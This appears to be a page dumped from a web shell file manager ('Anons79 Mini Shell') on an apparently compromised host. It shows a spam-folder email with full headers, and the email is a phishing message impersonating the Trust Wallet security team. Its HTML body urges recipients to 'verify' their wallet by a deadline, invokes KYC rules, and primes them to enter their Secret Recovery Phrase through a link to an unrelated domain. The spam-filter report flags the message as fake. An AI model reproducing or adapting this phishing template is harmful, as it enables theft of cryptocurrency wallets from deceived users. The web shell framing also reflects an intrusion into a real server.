Anons79 Mini Shell

Directory : /home/proudlyafrican/mail/.spam/new/
Upload File :
Current File : //home/proudlyafrican/mail/.spam/new/1751979642.M871347P2686774.nc-ph-2432.beatq.tech,S=6830,W=7008

Return-Path: <dh_irahx7@vps65205.dreamhostps.com>
Delivered-To: proudlyafrican+spam@nc-ph-2432.beatq.tech
Received: from nc-ph-2432.beatq.tech
	by nc-ph-2432.beatq.tech with LMTP
	id 2MJyM3oWbWg2/ygAm3PG5w
	(envelope-from <dh_irahx7@vps65205.dreamhostps.com>)
	for <proudlyafrican+spam@nc-ph-2432.beatq.tech>; Tue, 08 Jul 2025 13:00:42 +0000
Return-path: <dh_irahx7@vps65205.dreamhostps.com>
Envelope-to: info@proudlyafrican.co.uk
Delivery-date: Tue, 08 Jul 2025 13:00:42 +0000
Received: from vps65205.dreamhostps.com ([67.205.40.160]:42586)
	by nc-ph-2432.beatq.tech with esmtps  (TLS1.3) tls TLS_AES_256_GCM_SHA384
	(Exim 4.98.2)
	(envelope-from <dh_irahx7@vps65205.dreamhostps.com>)
	id 1uZ7wA-0000000BEvK-30bS
	for info@proudlyafrican.co.uk;
	Tue, 08 Jul 2025 13:00:42 +0000
Received: by vps65205.dreamhostps.com (Postfix, from userid 6801215)
	id 4bc0nk3Y9Bztw7GSf; Tue,  8 Jul 2025 05:30:50 -0700 (PDT)
To: info@proudlyafrican.co.uk
X-PHP-Originating-Script: 6801215:header.php
From: Trust Wallet Security Team <dh_irahx7@vps65205.dreamhostps.com>
Reply-To: dh_irahx7@vps65205.dreamhostps.com
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
Message-Id: <4bc0nk3Y9Bztw7GSf@vps65205.dreamhostps.com>
Date: Tue,  8 Jul 2025 05:30:50 -0700 (PDT)
X-Spam-Status: Yes, score=8.4
X-Spam-Score: 84
X-Spam-Bar: ++++++++
X-Spam-Report: Spam detection software, running on the system "nc-ph-2432.beatq.tech",
 has identified this incoming email as possible spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  Trust Wallet Notification Action Required: Verify Your Wallet
    
 Content analysis details:   (8.4 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
                              Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [67.205.40.160 listed in bl.score.senderscore.com]
  0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                          [67.205.40.160 listed in sa-trusted.bondedsender.org]
  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
               [Blocked - see <https://www.spamcop.net/bl.shtml?67.205.40.160>]
  0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
                              Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [67.205.40.160 listed in sa-accredit.habeas.com]
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was blocked.
                             See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URI: cialisprice18.us.com]
 -0.0 SPF_PASS               SPF: sender matches SPF record
 -0.0 SPF_HELO_PASS          SPF: HELO matches SPF record
  0.0 KAM_DMARC_STATUS       Test Rule for DKIM or SPF Failure with Strict
                             Alignment
  0.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
  0.0 HTML_IMAGE_ONLY_32     BODY: HTML: images with 2800-3200 bytes of words
  0.0 HTML_MESSAGE           BODY: HTML included in message
  7.0 KAM_FAKE_TRUSTWALLET   Fake Trust Wallet message
X-Spam-Flag: YES
Subject:  ***SPAM***  Verify Your Wallet to Avoid Service Restrictions

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Trust Wallet Notification</title>
  <style>
    body {
      background-color: #f5f7fa;
      font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
      margin: 0;
      padding: 0;
      color: #333;
    }
    .container {
      max-width: 600px;
      margin: 40px auto;
      background: #fff;
      border-radius: 8px;
      box-shadow: 0 0 10px rgba(0,0,0,0.05);
      padding: 30px;
    }
    .logo {
      text-align: center;
      margin-bottom: 20px;
    }
    .logo img {
      height: 60px;
      border-radius: 8px;
    }
    h2 {
      color: #0052ff;
      font-size: 22px;
      margin-bottom: 10px;
      text-align: center;
    }
    p {
      line-height: 1.6;
      font-size: 15px;
      margin: 10px 0;
    }
    .highlight {
      background-color: #f0f4ff;
      padding: 12px;
      border-left: 4px solid #0052ff;
      border-radius: 4px;
      margin: 20px 0;
    }
    .cta {
      text-align: center;
      margin-top: 30px;
    }
    .cta a {
      background-color: #0052ff;
      color: white;
      text-decoration: none;
      padding: 12px 24px;
      border-radius: 4px;
      font-weight: bold;
      display: inline-block;
    }
    .footer {
      text-align: center;
      font-size: 12px;
      color: #999;
      margin-top: 40px;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="logo">
      <img src="https://i.pinimg.com/736x/76/56/f3/7656f3ec2e68004642620c76588f6dfa.jpg" alt="Trust Wallet Logo" />
    </div>

    <h2>Action Required: Verify Your Wallet</h2>

    <p>
      Trust Wallet does not store your password or recovery phrase. If you're experiencing issues accessing your account, you can recover it using your <strong>Secret Recovery Phrase</strong>.
    </p>

    <div class="highlight">
      <strong>Important:</strong> To comply with financial regulations and ensure your wallet remains active, all users must complete wallet verification by <strong>July 26, 2025</strong>.
    </div>

    <p>
      As part of our commitment to regulatory compliance and protecting your digital assets, we require all users to verify their wallets in accordance with <strong>KYC (Know Your Customer)</strong> guidelines.
    </p>

    <p>
      Please ensure you have access to your Secret Recovery Phrase before proceeding. This action cannot be undone.
    </p>

    <div class="cta">
      <a href="https://www.cialisprice18.us.com/wallet.php">Verify Wallet Now</a>
    </div>

    <div class="footer">
      &copy; 2025 Trust Wallet. All rights reserved.<br>
      This is an automated notification. Please do not reply to this message.
    </div>
  </div>
</body>
</html>


Anons79 File Manager Version 1.0, Coded By Anons79
Email: [email protected]